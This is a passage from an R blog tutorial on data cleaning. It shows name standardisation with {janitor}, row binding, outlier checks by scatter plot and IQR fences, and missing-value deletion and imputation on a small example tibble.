&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Male&amp;#34;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Male&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;80&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;91&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;87&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;77&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jenny&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Dave&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;11&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Male&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;40&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;70&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 5 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name Age gender Score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber NA &amp;lt;NA&amp;gt; 87&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve NA Female NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name Age gender Score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 6 Jenny 29 Female 40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="addressing-data-inconsistencies"&gt;Addressing Data Inconsistencies:&lt;/h3&gt;
&lt;p&gt;Suppose the dataset combines data from different sources that store
the same information in different ways. We can resolve these inconsistencies as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Standardisation:&lt;/strong&gt; We can standardise the names to follow a
consistent format. In the example below, &lt;code&gt;clean_names()&lt;/code&gt; from {janitor}
changes the column names “Age” and “Score” to “age” and “score”.
This lowercase naming convention is consistent with the other column
names.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_names&lt;/span&gt;(df_1)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_names&lt;/span&gt;(df_2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 5 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber NA &amp;lt;NA&amp;gt; 87&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve NA Female NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 2 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 6 Jenny 29 Female 40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Integration:&lt;/strong&gt; When combining data from multiple sources,
ensure that all data fields align correctly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s combine the data frames &lt;code&gt;df_1&lt;/code&gt; and &lt;code&gt;df_2&lt;/code&gt; vertically by stacking
their rows on top of each other to create a unified data frame, &lt;code&gt;df&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;bind_rows&lt;/span&gt;(df_1, df_2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber NA &amp;lt;NA&amp;gt; 87&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve NA Female NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
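&lt;p&gt;To see why it is worth standardising names before combining, here is a
minimal sketch using two small, made-up tibbles (&lt;code&gt;raw_a&lt;/code&gt; and &lt;code&gt;raw_b&lt;/code&gt; are
hypothetical and not part of the data above). &lt;code&gt;bind_rows()&lt;/code&gt; matches columns
by name, so a field called &lt;code&gt;Age&lt;/code&gt; in one source and &lt;code&gt;age&lt;/code&gt; in the other ends
up as two separate, partly empty columns. The sketch uses &lt;code&gt;rename_with()&lt;/code&gt; and
&lt;code&gt;tolower()&lt;/code&gt; as a stand-in for &lt;code&gt;clean_names()&lt;/code&gt; so that it only needs {dplyr}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)

# Hypothetical inputs: the same field, with different capitalisation
raw_a &amp;lt;- tibble(id = 1:2, Age = c(25, 31))
raw_b &amp;lt;- tibble(id = 3:4, age = c(29, 11))

# Columns present in the first source but not the second
setdiff(names(raw_a), names(raw_b))
## [1] &amp;#34;Age&amp;#34;

# bind_rows() matches by name, so the mismatch gives two columns padded with NA
mismatched &amp;lt;- bind_rows(raw_a, raw_b)
names(mismatched)
## [1] &amp;#34;id&amp;#34;  &amp;#34;Age&amp;#34; &amp;#34;age&amp;#34;

# Once the names agree, the rows stack into a single age column
aligned &amp;lt;- bind_rows(rename_with(raw_a, tolower), rename_with(raw_b, tolower))
names(aligned)
## [1] &amp;#34;id&amp;#34;  &amp;#34;age&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A quick &lt;code&gt;setdiff()&lt;/code&gt; on the column names before binding is a cheap way to
catch this kind of mismatch early.&lt;/p&gt;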
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-best-practices-data-cleaning"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="managing-outliers"&gt;Managing Outliers:&lt;/h3&gt;
&lt;p&gt;Let’s assume that there are some extreme outliers in the dataset. We can
deal with outliers as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Visual Inspection:&lt;/strong&gt; Plotting a scatter plot may reveal outliers as
data points far away from the general trend. We can visually inspect
these data points and decide how to deal with them. Deletion of
outliers is only recommended when the data point is seen as a
data-entry mistake, rather than unusual. However, getting the record
corrected would be a better solution!&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(df, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; age, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; score)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_smooth&lt;/span&gt;(method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lm&amp;#34;&lt;/span&gt;, se &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter Plot of Age vs. Score&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Age&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Score&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/plot.png" alt="Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 29, score 40." style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We see that there is one potential outlier. Typically, Score increases
with Age, but Jenny’s score is very low, given her age.&lt;/p&gt;
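&lt;p&gt;A visual check can be backed up with a simple numerical rule. The sketch
below is one possible approach, not the method behind the plot: it flags any
score that lies more than 1.5 times the interquartile range beyond the
quartiles (the 1.5 multiplier is a common convention and an assumption here).
It rebuilds the non-missing scores from the table above in a hypothetical
tibble called &lt;code&gt;scores&lt;/code&gt; so that it runs on its own. Note that this rule looks
at score in isolation, rather than at the trend with age.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)

# Scores from the combined data above, leaving out the missing score
scores &amp;lt;- tibble(
  name = c(&amp;#34;Alice&amp;#34;, &amp;#34;Bob&amp;#34;, &amp;#34;Amber&amp;#34;, &amp;#34;Fred&amp;#34;, &amp;#34;Jenny&amp;#34;, &amp;#34;Dave&amp;#34;),
  score = c(80, 91, 87, 77, 40, 70)
)

# Fences at 1.5 * IQR beyond the first and third quartiles
q &amp;lt;- quantile(scores$score, c(0.25, 0.75))
lower &amp;lt;- q[[1]] - 1.5 * IQR(scores$score)
upper &amp;lt;- q[[2]] + 1.5 * IQR(scores$score)

# Keep only the rows that fall outside the fences
flagged &amp;lt;- scores %&amp;gt;%
  filter(score &amp;lt; lower | score &amp;gt; upper)

flagged$name
## [1] &amp;#34;Jenny&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A flag like this is a prompt to investigate the record, not a reason to
delete it.&lt;/p&gt;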
&lt;h3 id="handling-missing-data"&gt;Handling Missing Data:&lt;/h3&gt;
&lt;p&gt;Missing data is a common challenge in real-world datasets. Ignoring
missing values or handling them poorly can lead to skewed conclusions.
Some methods of handling missing data are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deletion:&lt;/strong&gt; Remove rows or columns with missing values. This should
only be done when the “missing-ness” is not related to the outcome of
interest.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Imputation:&lt;/strong&gt; Replace missing values with statistical measures such
as the mean, median, or mode.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Advanced Techniques:&lt;/strong&gt; Model-based imputation methods,
like K-nearest neighbors (KNN) or regression imputation, use the other
variables to predict each missing value. They are often more accurate
than filling with a single summary statistic, and can reduce the bias
in our models and findings.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
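&lt;p&gt;Before choosing between these options, it helps to know how much is
actually missing. The sketch below rebuilds the combined data in a
hypothetical tibble called &lt;code&gt;people&lt;/code&gt; so that it runs on its own, counts the
missing values in each column, and then shows the deletion approach using
&lt;code&gt;drop_na()&lt;/code&gt; from {tidyr}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)
library(tidyr)

# Same values as the combined data frame above
people &amp;lt;- tibble(
  id = 1:7,
  age = c(25, 31, NA, 23, NA, 29, 11),
  gender = c(&amp;#34;Female&amp;#34;, &amp;#34;Male&amp;#34;, NA, &amp;#34;Male&amp;#34;, &amp;#34;Female&amp;#34;, &amp;#34;Female&amp;#34;, &amp;#34;Male&amp;#34;),
  score = c(80, 91, 87, 77, NA, 40, 70)
)

# Number of missing values in each column
na_counts &amp;lt;- people %&amp;gt;%
  summarise(across(everything(), ~ sum(is.na(.x))))

# Deletion: drop rows with a missing value in any column...
complete_rows &amp;lt;- drop_na(people)

# ...or only the rows where score is missing
has_score &amp;lt;- drop_na(people, score)

c(nrow(people), nrow(complete_rows), nrow(has_score))
## [1] 7 5 6
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With only seven rows, dropping every incomplete row loses almost a third
of the data, which is one reason imputation is often preferred for small
datasets.&lt;/p&gt;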
&lt;p&gt;Below, we apply simple imputation to our data. Missing values in
‘age’ are replaced with the column mean, missing values in ‘score’ with
the column median, and missing values in ‘gender’ with the label
“Unknown”. Subsequently, the ‘gender’ column is converted to a factor
and the ‘age’ column to an integer to ensure accurate analysis. The code also showcases advanced
transformations such as encoding categorical variables as binary
features and performing data splitting for machine learning models.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(age, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(age, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(score, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;median&lt;/span&gt;(score, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(gender, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Unknown&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23.8 Unknown 87 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23.8 Female 78.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The cleaning and processing steps in this post rely on the
{tidyverse} package. The {tidyverse} package is an umbrella package; it
loads a set of useful packages for us. The ones we rely on here are
&lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;{dplyr}&lt;/a&gt; and
&lt;a href="https://tidyr.tidyverse.org/" rel="external"&gt;{tidyr}&lt;/a&gt;. Next, let’s fix the column types.&lt;/p&gt;
&lt;p&gt;When working with data in R, it’s important to ensure that the data is
in the right format for analysis and visualisation. Factors are data
types in R that are used to represent categorical variables. Let’s
convert the &lt;code&gt;gender&lt;/code&gt; column to a factor and the &lt;code&gt;age&lt;/code&gt; column to an
